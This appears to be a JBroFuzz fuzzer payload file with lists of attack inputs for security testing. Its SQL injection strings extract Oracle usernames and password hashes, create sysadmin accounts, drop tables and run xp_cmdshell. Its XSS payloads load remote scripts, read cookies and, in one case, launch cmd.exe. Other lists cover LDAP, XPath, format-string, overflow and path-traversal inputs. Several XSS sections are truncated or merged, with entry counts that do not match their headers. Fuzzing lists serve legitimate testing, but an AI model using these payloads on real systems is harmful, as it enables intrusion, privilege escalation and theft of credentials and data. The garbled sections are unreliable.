#
# JBroFuzz Fuzzer Prototypes
#
# Copyright (c) 2010
# [email protected]
# version 2.4
#
P:001-HTT-PMT:HTTP Methods:15
> HTTP | Replacive Fuzzers
>> HTTP and WebDAV request methods in lowercase, for checking which verbs a server accepts and how it responds to each
get
post
head
put
delete
trace
propfind
options
copy
move
mkcol
proppatch
lock
unlock
search
P:002-INT-OVF:Integer Overflows:12
> Exploits | Replacive Fuzzers | Integer Overflows
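>> Zero, -1 and hexadecimal values at powers of two and at or near the signed and unsigned 32-bit limits, for checking how numeric input is parsed and bounded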
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
P:003-FSE-STR:Format String Payloads:19
> Exploits | Replacive Fuzzers | Format String Errors
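>> printf-style conversion specifiers, including %n and oversized field widths; a crash or leaked memory in the response suggests input is being used as a format string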
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%z%t%i%e%g%f%a%c%s%08x%%
f(x)=%sasdf x 129
f(x)=%x x 257
P:004-SQL-INJ:SQL Injection:16
> Replacive Fuzzers | SQL Injection | Injection
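>> Quote, comment-marker and always-true fragments for checking whether input is concatenated into a SQL statement; a parameterized query treats every entry as plain data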
a
a'
a' --
a' or 1=1; --
@
?
' and 1=0) union all
? or 1=1 --
x' and userid is NULL; --
x' and email is NULL; --
anything' or 'x'='x
x' and 1=(select count(*) from tabname); --
x' and members.email is NULL; --
x' or full_name like '%bob%
23 or 1=1; --
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
P:005-SQL-INJ:MySQL Injection 101:4
> Replacive Fuzzers | SQL Injection | Injection
>> Basic numeric and quoted tautologies; the user_name() = 'dbo' entry is a Microsoft SQL Server construct despite the MySQL category name
a
1 or 1=1
1' or '1'='1
1 and user_name() = 'dbo'
P:006-SQL-INJ:MySQL Injection (Blind):5
> Replacive Fuzzers | SQL Injection | Injection
>> Short probes for blind testing; the sp_ and xp_ procedure prefixes in the third entry belong to Microsoft SQL Server rather than MySQL
1
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
P:007-SQL-INJ:MySQL/MS SQL Common Injection:9
> Replacive Fuzzers | SQL Injection | Injection
>>This is a comment line to be changed in the future
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
P:008-SQL-INJ:Oracle SQL Injection:54
> Replacive Fuzzers | SQL Injection | Injection
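>> Oracle probes built on utl_inaddr.get_host_address and utl_http.request, which surface query results through error messages or outbound requests; bind variables and restricted EXECUTE on these packages limit both paths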
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
P:009-SQL-INJ:Passive SQL Injection:55
> Replacive Fuzzers | SQL Injection | Injection
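>> Mostly read-oriented probes: tautologies, comment markers, UNION SELECT, and version, schema and load_file lookups, for checking whether input reaches the SQL parser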
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' or 1=1--
or 1=1
' or '1'='1
; or '1'='1'
" or isNULL(1/0) /*
' or '7659'='7659
" or isNULL(1/0) /*
' --
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
admin' or '
' select * from information_schema.tables--
) union select * from information_schema.tables;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' or 'unusual' = 'unusual'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'something' like 'some%'
' or 2 > 1
' or 'text' > 't'
' or 'whatever' in ('whatever')
' or 2 between 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
password:*/=1--
uni/**/on sel/**/ect
'; execute immediate 'sel' || 'ect us' || 'er'
'; exec ('sel' + 'ect us' + 'er')
'/**/or/**/1/**/=/**/1
' or 1/*
or isNULL(1/0) /*
' or '7659'='7659
" or isNULL(1/0) /*
' -- &password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
P:010-SQL-INJ:Active SQL Injection:9
> Replacive Fuzzers | SQL Injection| Injection
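>> State-changing statements (account creation, role and privilege grants, DROP TABLE, xp_cmdshell) across several database products; an application account held to least privilege should be refused every one of them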
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
create user name identified by 'pass123'
create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
grant connect to name; grant resource to name;
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
P:011-SQL-INJ:MS SQL Injection i:8
> SQL Injection | Injection | Replacive Fuzzers
>>This is a comment line to be changed in the future
a
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
P:012-SQL-INJ:MS SQL Ninja Injection (Blind):9
> SQL Injection | Injection | Replacive Fuzzers
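>> Conditional WAITFOR DELAY '0:0:2' statements; a response that is consistently about two seconds slower suggests the injected condition ran on the server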
a
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
P:013-LDP-INJ:LDAP Injection:14
> Replacive Fuzzers | LDAP Injection | Injection
>> LDAP filter metacharacters and wildcard filter fragments, for checking that input is escaped before it is placed in a search filter
|
!
(
)
&
!
|
*|
*(|(mail=*))
*(|(objectclass=*))
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*
P:014-XPT-INJ:XPath Injection:10
> Replacive Fuzzers | XPath Injection | Injection
>> Quote-based tautologies and XPath axis, wildcard and function expressions, for checking that input is not concatenated into an XPath query
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
P:015-XSS-101:XSS 101:9
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
'>
`>
>
<
>"'
P:016-XSS-102:XSS 102:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
'';!--"=&{()}
*/a=eval;b=alert;a(b(/e/.source));/*
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
MOVE MOUSE OVER THIS AREA
perl -e 'print "alert("XSS")";' > out
Div Body
P:017-XSS-JSB:XSS JS Breaks:11
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
alert(1)
A=alert;A(1)
+alert(0)+
';//%0da=eval;b=alert;a(b(9));//
a=1;a=eval;b=alert;a(b(11));//
'};a=eval;b=alert;a(b(13));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
xyz onerror=alert(6);
P:018-XSS-4IE:XSS Internet Explorer:38
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
exp/*
XSS
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
>%22%27>
P:019-XSS-GEK:XSS Gecko:11
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
">'>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}
'';!--"=&{(alert(1))}
MOVE MOUSE OVER THIS AREA
'';!--"=&{()}
P:022-XSS-EMB:XSS Embed/Evade:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
PT SRC="http://ha.ckers.org/xss.js">
P:023-XSS-IMG:XSS Image Tag:10
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
">",
P:024-XSS-NET:ASP .NET validateRequest:5
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
XSS-STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
">
P:025-XSS-XML:XSS XML Injection:6
> XSS | XML Injection | Replacive Fuzzers | Injection
>>This is a comment line to be changed in the future
]]>xssalert(document.cookie);
P:026-XSS-URI:URI Cross Site Scripting:4
> XSS | URI Exploits | Replacive Fuzzers
>>This is a comment line to be changed in the future
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
P:027-XSS-JSN:JSON:5
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
XSS | Replacive Fuzzers | Web Server
>>This is a comment line to be changed in the future
P:029-PTH-SMF:Sample Files:2
> Web Server | Replacive Fuzzers
>> Relative paths that climb out of the web root toward boot.ini and the Windows repair setup.log; a canonicalizing path check should refuse both
/../.. /../../../boot.ini
/../../../../../winnt/repair/setup.log
P:030-XSS-BRK:URL Breaking:3
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
httP://aa">
httP://aa'>
httP://aa
R:031-B16-HEX:Base16 (HEX):16
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
a
b
c
d
e
f
R:032-B10-DEC:Base10 (DEC):10
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
R:033-B08-OCT:Base08 (OCTAL):8
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
R:034-B02-BIN:Base02 (binary):2
> Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
R:035-B36-ALP:Alpha Numeric:36
> Alphabets | Recursive Fuzzers
>>This is a comment line to be changed in the future
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
R:036-ALP-HAB:English Alphabet:26
> Alphabets | Recursive Fuzzers
>>This is a comment line to be changed in the future
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
R:037-B64-RFC:Base64 Alphabet:64
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> The 64 characters of the standard Base64 alphabet followed by the = padding character, so the list holds 65 entries although the header declares 64
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
+
/
=
R:038-B64-URL:Base64 (URL/File Safe) Alphabet:64
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
5
6
7
8
9
-
_
=
R:039-B32-RFC:Base32 Alphabet:32
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
2
3
4
5
6
7
=
R:040-B32-HEX:Base32 (Extended HEX) Alphabet:32
> Alphabets | Number Systems | Base | Recursive Fuzzers
>>This is a comment line to be changed in the future
0
1
2
3
4
5
6
7
8
9
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
=
P:041-BFO-EXP:Long Strings of aaa's:17
> Exploits | Buffer Overflows
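>> The letter a repeated at lengths of 2^n + 1 from 3 to 65537, for checking length limits on input; the 4197 entry breaks the pattern (4097 may have been intended)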
a
f(x)=a x 3
f(x)=a x 5
f(x)=a x 9
f(x)=a x 17
f(x)=a x 33
f(x)=a x 65
f(x)=a x 129
f(x)=a x 257
f(x)=a x 513
f(x)=a x 1025
f(x)=a x 2049
f(x)=a x 4197
f(x)=a x 8193
f(x)=a x 16385
f(x)=a x 32769
f(x)=a x 65537
R:042-DNA-ALP:DNA Fuzzer:4
> Biology | Alphabets
>>This is a comment line to be changed in the future
a
t
c
g
P:043-XSS-AXL:MS Anti-XSS lib_v3.0:78
> XSS | Replacive Fuzzers
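>> HTML tag, attribute and style fragments that each try to run alert('XSS') or load a remote script, for checking that output encoding renders them as inert text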
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://testsite.com/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://testsite.com/xss.css">
<STYLE>@import'http://testsite.com/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://testsite.com/xss.htc);">
<SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT>
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " >
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://testsite.com/xss.js
<SCRIPT SRC=//testsite.com/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://testsite.com/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">
<SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT>
